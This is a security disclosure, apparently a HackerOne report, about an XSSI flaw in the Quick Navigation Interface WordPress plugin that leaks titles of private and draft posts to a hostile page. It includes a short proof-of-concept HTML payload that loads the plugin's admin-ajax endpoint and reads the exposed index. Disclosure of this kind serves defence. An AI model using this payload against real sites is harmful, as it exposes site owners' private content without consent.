Ian Dunn: XSSI: Quick Navigation Interface - leak of private page/post titles

2019-02-13T20:31:28
ID H1:495525
Type hackerone
Reporter foobar7
Modified 2019-02-15T08:03:49

Description

CVSS

Medium 4.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Description

The Quick Navigation Interface plugin includes the names of all posts and pages in an automatically generated JavaScript file.

By including this file in their own page, an attacker can view all post titles - including those of drafts and private posts, which should remain secret - if an authenticated user visits their website.

POC

Setup: install the plugin & create a private post (set "Visibility" to "private").

While authenticated, visit a webpage that contains the following HTML code:

<script src="http://192.168.0.104/wordpress5/wordpress/wp-admin/admin-ajax.php?action=qni_content_index"></script>
<script>
console.log(window.qniContentIndex); // in a real-world attack, this would be send to the attacker's server
</script>

Impact

disclosure of private post/page titles